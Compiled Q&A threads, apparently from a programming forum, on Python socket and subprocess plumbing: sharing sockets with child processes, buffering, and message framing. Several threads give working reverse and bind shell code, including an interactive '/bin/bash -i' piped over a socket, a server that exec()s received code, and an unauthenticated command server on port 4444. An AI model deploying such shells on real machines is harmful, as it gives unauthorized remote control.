Python connect socket to process

I have a (very) simple web server I wrote in C and I want to test it. I wrote it so it takes data on stdin and sends out on stdout. How would I connect the input/output of a socket (created with socket.accept()) to the input/output of a process created with subprocess.Popen?
Sounds simple, right? Here's the killer: I'm running Windows.
Can anyone help?
Here's what I've tried:
Passing the client object itself as stdin/out to subprocess.Popen. (It never hurts to try.)
Passing socket.makefile() results as stdin/out to subprocess.Popen.
Passing the socket's file number to os.fdopen().
Also, in case the question was unclear, here's a slimmed-down version of my code:
import socket, subprocess, os

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', PORT))
sock.listen(5)
cli, addr = sock.accept()
p = subprocess.Popen([PROG])
#I want to connect 'p' to the 'cli' socket so whatever it sends on stdout
#goes to the client and whatever the client sends goes to its stdin.
#I've tried:
p = subprocess.Popen([PROG], stdin = cli.makefile("r"), stdout = cli.makefile("w"))
p = subprocess.Popen([PROG], stdin = cli, stdout = cli)
p = subprocess.Popen([PROG], stdin = os.fdopen(cli.fileno(), "r"), stdout = os.fdopen(cli.fileno(), "w"))
#but all of them give me either "Bad file descriptor" or "The handle is invalid".

I had the same issue and tried the same ways of binding the socket, also on Windows. The solution I came up with was to share the socket with the child process and bind it to stdin and stdout there. My solution is completely in Python, but I guess it is easily convertible.
import socket, subprocess
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', PORT))
sock.listen(5)
cli, addr = sock.accept()
process = subprocess.Popen([PROG], stdin=subprocess.PIPE)
process.stdin.write(cli.share(process.pid))
process.stdin.flush()
# you can now use `cli` as client normally
And in the other process:
import sys, os, socket
sock = socket.fromshare(os.read(sys.stdin.fileno(), 372))
sys.stdin = sock.makefile("r")
sys.stdout = sock.makefile("w")
# stdin now reads from `sock` and stdout now writes to `sock`
The 372 is the length of the data returned by the socket.share() call when I measured it. I don't know if this length is constant, but it worked for me. This is possible only on Windows, as the share function is only available on that OS.
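If the magic 372 bothers you, you can avoid it by sending the length of the shared blob ahead of the blob itself. A minimal sketch of that variant (my own example, assuming Python 3.3+ on Windows, with PORT and PROG as in the question):

# parent.py
import socket, struct, subprocess

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', PORT))
sock.listen(5)
cli, addr = sock.accept()

process = subprocess.Popen([PROG], stdin=subprocess.PIPE)
blob = cli.share(process.pid)                      # serialized socket info
process.stdin.write(struct.pack('<I', len(blob)))  # 4-byte length prefix
process.stdin.write(blob)
process.stdin.flush()

And in the child:

# child.py
import sys, socket, struct

stdin = sys.stdin.buffer                 # binary view of stdin (Python 3)
(n,) = struct.unpack('<I', stdin.read(4))
sock = socket.fromshare(stdin.read(n))   # rebuild the shared socket
sys.stdin = sock.makefile('r')
sys.stdout = sock.makefile('w')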

Related

Python socket.accept() blocking code before call?

I am trying to learn Python sockets and have hit a snag with the socket.accept() method. As I understand the method, once I call accept, the thread will sit and wait for an incoming connection (blocking all following code). However, in the code below (which I got from https://docs.python.org/2/library/socket.html, running on localhost), I added a print('hello') as the first line of the server, yet the print doesn't appear until after I disconnect the client. Why is this? Why does accept seem to run before my print yet after I bind the socket?
# Echo server program
import socket

print('hello')  # This doesn't print until I disconnect the client
HOST = 'localhost'
PORT = 50007
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
print 'Connected by', addr
while 1:
    data = conn.recv(1024)
    if not data: break
    conn.sendall(data)
conn.close()
# Echo client program
import socket
HOST = 'localhost' # The remote host
PORT = 50007 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall('Hello, world')
data = s.recv(1024)
s.close()
print 'Received', repr(data)
You are likely using an output device on a system that Python's IO doesn't recognize as interactive. As a workaround, you can add sys.stdout.flush() after the print.
The standard output is a buffered stream, meaning that when you print something, the output sticks around in an internal buffer until you print enough data to fill the whole buffer (unlikely in a small program; the buffer is several kilobytes in size), or until the program exits, when all such buffers are automatically flushed. Normally, when the output is a terminal, the IO layer automatically switches to line buffering, where the buffer is also flushed whenever a newline character is printed (and the print statement appends one automatically).
For some reason, that doesn't work on your system, and you have to flush explicitly. Another option is to run python -u, which should force unbuffered standard streams.
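As an illustration, here is a minimal sketch of the workaround applied to the start of the echo server (the same code as above, plus the explicit flush):

import socket
import sys

print('hello')
sys.stdout.flush()  # force the buffered text out before accept() blocks

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 50007))
s.listen(1)
conn, addr = s.accept()  # blocks here, but 'hello' is already visible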

Python true interactive remote reverse shell

I'm trying to create a true interactive remote shell using Python. When I say true, I mean I don't want to just execute a single command and send the results; I have that working already. I also don't want to abstract single-command execution by having the server interpret directory changes or whatnot.
I am trying to have a client start an interactive /bin/bash and have the server send commands which are then executed by the same persistent shell. For instance, if I run cd /foo/bar, then pwd should return /foo/bar, because I would be interacting with the same bash shell.
Here's some slimmed down example code that currently only will do single command execution...
# client.py
import socket
import subprocess

s = socket.socket()
s.connect(('localhost', 1337))
while True:
    cmd = s.recv(1024)
    # single command execution currently (not interactive shell)
    results = subprocess.Popen(cmd, shell=True,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               stdin=subprocess.PIPE)
    results = results.stdout.read() + results.stderr.read()
    s.sendall(results)
# server.py
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
while True:
    cmd = raw_input('> ').rstrip()
    conn.send(cmd)
    results = conn.recv(4096)
    print results
I've tried many solutions, none of which have worked. The subprocess module has a communicate() method, but it kills the shell after a single command. I'd really like to accomplish this with the stdlib, but I've also looked at the pexpect module after reading this thread. However, I can't get that to work either. It also doesn't look like its primary use case is creating an interactive shell, but rather catching specific command-line output for interaction. I can't even get single command execution working with pexpect...
import pexpect, sys
proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect('$ ')
proc.sendline('pwd\n')
If anyone can help, it would be appreciated. I feel like there could be a way to multi-thread and spawn off a /bin/bash -i with subprocess and then somehow write to its stdin and read from its stdout? Thanks in advance, and sorry for the length.
Try this code:
# client.py
import socket
import subprocess

s = socket.socket()
s.connect(('localhost', 1337))
process = subprocess.Popen(['/bin/bash', '-i'],
                           stdout=s.makefile('wb'), stderr=subprocess.STDOUT,
                           stdin=s.makefile('rb'))
process.wait()
# server.py
import sys
import socket
import subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
fp = conn.makefile('wb')
# 'cat' copies everything the client's shell writes back to our stdout
proc1 = subprocess.Popen('cat', stdin=conn.makefile('rb'))
while True:
    fp.write(sys.stdin.read(4096))
    fp.flush()  # push each command through the buffered file object
proc1.wait()
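If you want the shell to behave like a real terminal session (prompt, line editing, job control), one POSIX-only alternative is to duplicate the socket onto the standard file descriptors and run bash under a pseudo-terminal with the stdlib pty module. A minimal sketch of that variant (my own example, not part of the answer above):

# client_pty.py
import os, pty, socket

s = socket.socket()
s.connect(('localhost', 1337))
os.dup2(s.fileno(), 0)  # stdin  <- socket
os.dup2(s.fileno(), 1)  # stdout -> socket
os.dup2(s.fileno(), 2)  # stderr -> socket
pty.spawn('/bin/bash')  # blocks until the shell exits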

Python. Redirect stdout to a socket

I run my script on computer "A". Then I connect to computer "A" from computer "B" through my script. I send my message to computer "A" and my script runs it with an exec() instruction.
I want to see the result of executing my message on computer "A", through a socket on computer "B".
I tried to change sys.stdout to socket_response but got an error: "Socket object has no attribute write()".
So, how can I redirect standard output (for print or exec()) from computer "A" to computer "B" through socket connection?
It will be some kind of 'Python interpreter' inside my script.
(Sorry, I can't answer my own question without reputation, so the answer follows here.)
Thanks to all!
I used the simple way that @Torxed advised me of. Here's my pseudo-code (it's just an example, not my real script):
#-*-coding:utf-8-*-
import socket
import sys

class stdout_():
    def __init__(self, sock_resp):
        self.sock_resp = sock_resp
    def write(self, mes):
        self.sock_resp.send(mes)

MY_IP = 'localhost'
MY_PORT = 31337
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Start server")
old_out = sys.stdout
srv.bind((MY_IP, MY_PORT))
srv.listen(0)
sock_resp, addr_resp = srv.accept()
new_out = stdout_(sock_resp)
sys.stdout = new_out
#sys.stdout = sock_resp ### sock_object has no attribute 'write'
while 1:
    try:
        a = sock_resp.recv(1024)
        exec(a)
    except socket.timeout:
        #print('server timeout!!' + '\n')
        continue
I connected to the script with PuTTY and sent "print 'abc'", and then I received the answer 'abc'.
There is the makefile function in Python's socket class:
socket.makefile(mode='r', buffering=None, *, encoding=None, errors=None, newline=None)
Return a file object associated with the socket. The exact returned
type depends on the arguments given to makefile(). These arguments are
interpreted the same way as by the built-in open() function.
Closing the file object won’t close the socket unless there are no
remaining references to the socket. The socket must be in blocking
mode; it can have a timeout, but the file object’s internal buffer may
end up in an inconsistent state if a timeout occurs.
You can read how to use it in Mark Lutz's book (chapter 12, "Making Sockets Look Like Files and Streams").
An example from the book (the idea is simple: make a file object from a socket with socket.makefile and link sys.stdout with it):
def redirectOut(port=port, host=host):
    """
    connect caller's standard output stream to a socket for GUI to listen
    start caller after listener started, else connect fails before accept
    """
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect((host, port))   # caller operates in client mode
    file = sock.makefile('w')    # file interface: text, buffered
    sys.stdout = file            # make prints go to sock.send
    return sock                  # if caller needs to access it raw
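For context, the listener end that redirectOut() connects to could look roughly like this (my own sketch; host and port are assumed to match the ones passed to redirectOut()):

from socket import socket, AF_INET, SOCK_STREAM

listener = socket(AF_INET, SOCK_STREAM)
listener.bind(('', port))         # the port redirectOut() connects to
listener.listen(1)
conn, addr = listener.accept()    # the redirected client connects here
while True:
    text = conn.recv(1024)        # flushed prints from the other side land here
    if not text:
        break
    print('received:', text.decode())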
Server side:
from subprocess import Popen, STDOUT, PIPE
from socket import socket
from time import sleep

server_sock = socket()
server_sock.bind(('', 8000))
server_sock.listen(4)

def close_process(p):
    p.stdin.close()
    p.stdout.close()

while 1:
    try:
        client, client_address = server_sock.accept()
        data = client.recv(8192)
    except:
        break
    # First, we open a handle to the external command to be run.
    process = Popen(data.decode('utf-8'), shell=True, stdout=PIPE, stdin=PIPE, stderr=STDOUT)
    # Wait for the command to finish
    # (.poll() will return the exit code, None if it's still running)
    while process.poll() is None:
        sleep(0.025)
    # Then we send whatever output the command gave us back via the socket.
    # Python 3: with stdout=PIPE the output is already a bytes object, and
    # sockets want bytes, so it can be sent as-is.
    try:
        client.send(process.stdout.read())
    except:
        pass
    # And finally, close the stdout/stdin of the process, otherwise
    # you'll end up with "too many file handles opened" in your OS.
    close_process(process)
    client.close()
server_sock.close()
This assumes Python 3.
If no one else has a better way of just redirecting output to a socket from a process, this is a solution you could work with.
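To try the server above, a throwaway client could look like this (my own sketch, assuming the same machine and port 8000):

import socket

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('localhost', 8000))
client.send(b'echo hello')         # the server runs this through the shell
print(client.recv(8192).decode())  # and sends the command's output back
client.close()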

Python client-server script hangs until I press [enter]

I have a basic client-server script in Python using sockets. The server binds to a specific port and waits for a client connection. When a client connects, they are presented with a raw_input prompt that sends the entered commands to a subprocess on the server and pipes the output back to the client.
Sometimes when I execute commands from the client, the output will hang and not present me with the raw_input prompt until I press the [enter] key.
At first I thought this might be a buffering problem, but it happens even with commands that produce small output, like 'clear' or 'ls'.
The client code:
import os, sys
import socket
from base64 import *
import time

try:
    HOST = sys.argv[1]
    PORT = int(sys.argv[2])
except IndexError:
    print("You must specify a host IP address and port number!")
    print("usage: ./handler_client.py 192.168.1.4 4444")
    sys.exit()

socksize = 4096
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    server.connect((HOST, PORT))
    print("[+] Connection established!")
    print("[+] Type ':help' to view commands.")
except:
    print("[!] Connection error!")
    sys.exit(2)

while True:
    data = server.recv(socksize)
    cmd = raw_input(data)
    server.sendall(str(cmd))
server.close()
Server code:
import os, sys
import socket
import time
from subprocess import Popen, PIPE, STDOUT, call

HOST = ''
PORT = 4444
socksize = 4096
activePID = []

conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.bind((HOST, PORT))
conn.listen(5)
print("Listening on TCP port %s" % PORT)

def reaper():
    while activePID:
        pid, stat = os.waitpid(0, os.WNOHANG)
        if not pid: break
        activePID.remove(pid)

def handler(connection):
    time.sleep(3)
    while True:
        cmd = connection.recv(socksize)
        proc = Popen(cmd,
                     shell=True,
                     stdout=PIPE,
                     stderr=PIPE,
                     stdin=PIPE,
                     )
        stdout, stderr = proc.communicate()
        if cmd == ":killme":
            connection.close()
            sys.exit(0)
        elif proc:
            connection.send(stdout)
            connection.send("\nshell => ")
    connection.close()
    os._exit(0)

def accept():
    while 1:
        global connection
        connection, address = conn.accept()
        print "[!] New connection!"
        connection.send("\nshell => ")
        reaper()
        childPid = os.fork()  # forks the incoming connection and sends to conn handler
        if childPid == 0:
            handler(connection)
        else:
            activePID.append(childPid)

accept()
The problem I see is that the final loop in the client only does one server.recv(socksize), and then it calls raw_input(). If that recv() call does not obtain all of the data sent by the server in that single call, then it also won't collect the prompt that follows the command output and therefore won't show that next prompt. The uncollected input will sit in the socket until you enter the next command, and then it will be collected and shown. (In principle it could take many recv() calls to drain the socket and get to the appended prompt, not just two calls.)
If this is what's happening then you would hit the problem if the command sent back more than one buffer's worth (4KB) of data, or if it generated output in small chunks spaced out in time so that the server side could spread that data over multiple sends that are not coalesced quickly enough for the client to collect them all in a single recv().
To fix this, you need to have the client do as many recv() calls as it takes to completely drain the socket. So you need to come up with a way for the client to know that the socket has been drained of everything that the server is going to send in this interaction.
The easiest way to do this is to have the server add boundary markers into the data stream and then have the client inspect those markers to discover when the final data from the current interaction has been collected. There are various ways to do this, but I'd probably have the server insert a "this is the length of the following chunk of data" marker ahead of every chunk it sends, and send a marker with a length of zero after the final chunk.
The client-side main loop then becomes:
forever:
    read a marker
    if the length carried in the marker is zero:
        break
    else:
        read exactly that many bytes
Note that the client must be sure to recv() the complete marker before it acts on it; stuff can come out of a stream socket in lumps of any size, completely unrelated to the size of the writes that sent that stuff into the socket at the sender's side.
You get to decide whether to send the marker as variable-length text (with a distinctive delimiter) or as fixed-length binary (in which case you have to worry about endian issues if the client and server can be on different systems). You also get to decide whether the client should show each chunk as it arrives (obviously you can't use raw_input() to do that) or whether it should collect all of the chunks and show the whole thing in one blast after the final chunk has been collected.
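To make the marker scheme concrete, here is a minimal sketch (my own example, not the asker's code) using a fixed 4-byte big-endian length header built with struct:

import struct

def send_msg(sock, data):
    # Prefix each chunk with a 4-byte big-endian length header.
    sock.sendall(struct.pack('>I', len(data)) + data)

def recv_exactly(sock, n):
    # recv() may return fewer bytes than asked for, so loop until
    # exactly n bytes have been collected.
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError('socket closed mid-message')
        buf += chunk
    return buf

def recv_msg(sock):
    # Read the complete marker first, then exactly that many payload bytes.
    (length,) = struct.unpack('>I', recv_exactly(sock, 4))
    return recv_exactly(sock, length) if length else None  # None = end of interaction

The server calls send_msg() for each chunk of output and finishes with send_msg(sock, b''); the client loops on recv_msg() until it gets None, and only then shows its next prompt.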

Python sending command over a socket

I'm having a bit of trouble. I want to create a simple program that connects to the server and executes a command using subprocess then returns the result to the client. It's simple but I can't get it to work. Right now this is what I have:
client:
import sys, socket, subprocess

conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = sys.argv[1]
port = int(sys.argv[2])
socksize = 1024
conn.connect((host, port))
while True:
    shell = raw_input("$ ")
    conn.send(shell)
    data = conn.recv(socksize)
    #msglen = len(data)
    output = data
    iotype = subprocess.PIPE
    cmd = ['/bin/sh', '-c', shell]
    proc = subprocess.Popen(cmd, stdout=iotype).wait()
    stdout, stderr = proc.communicate()
    conn.send(stdout)
    print(output)
    if proc.returncode != 0:
        print("Error")
server:
import sys, socket, subprocess

host = ''
port = 50106
socksize = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
print("Server started on port: %s" % port)
s.listen(1)
print("Now listening...\n")
conn, addr = s.accept()
while True:
    print 'New connection from %s:%d' % (addr[0], addr[1])
    data = conn.recv(socksize)
    cmd = ['/bin/sh', '-c', data]
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE).wait()
    stdout, stderr = cmd.communicate()
    if not data:
        break
    elif data == 'killsrv':
        sys.exit()
Danger, Will Robinson!!!
Do you really want to send commands in clear text without authentication over the network? It is very, very dangerous.
Do it over SSH with paramiko.
Alright I've heard this answer too many times. I don't want to use SSH I'm just building it to learn more about sockets. I'm not going to actually use this if I want to send commands to a system. – AustinM
There is no way I could infer this noble quest from your question. :-)
The sockets module is a thin layer over the POSIX library; plain socket programming is tedious and hard to get right. As of today (2014), asynchronous I/O and concurrency are not among Python's strongest traits - 3.4 is starting to change that, but libraries will lag behind for a while. My advice is to spend your time learning some higher-level API like Twisted (twistedmatrix.com/trac). If you are really interested in the low-level stuff, dive into the project source.
Alright. Any idea on how I could use twisted for this type of thing? – AustinM
Look at twistedmatrix.com/documents/current/core/examples/#auto2
Well, I can understand your frustration, Austin; I was in the same boat. However, trial and error at last worked out. Hopefully you were looking for this:
print "Command is:",command
op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if op:
output=str(op.stdout.read())
print "Output:",output
conn.sendall(output)
else:
error=str(op.stderr.read())
print "Error:",error
conn.sendall(error)
It's unclear why you are using subprocess.Popen() for the same command in both the client and the server. Here's an outline of what I would try to do (pseudocode):
client

while True:
    read command from user
    send command to server
    wait for and then read response from server
    print response to user

server

while True:
    wait for and then read command from client
    if command is "killsrv", exit
    execute command and capture output
    send output to client
The problem with your code is these lines (in both client and server):
proc = subprocess.Popen(cmd, stdout=iotype).wait()
stdout,stderr = proc.communicate()
You are calling wait on the Popen object, which means that the variable proc is getting an int (returned by wait) instead of a Popen object. You can just get rid of the wait -- since communicate waits for the process to end before returning, and you aren't checking the exit code anyway, you don't need to call it.
Then, in your client, I don't think you even need the subprocess calls, unless you're running some command that the server is sending back.
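Concretely, the fixed fragment would look something like this (a sketch reusing the question's variable names):

# Keep the Popen object itself; don't replace it with wait()'s return value.
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()  # waits for the process to finish
conn.send(stdout)                    # proc.returncode is available here if needed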
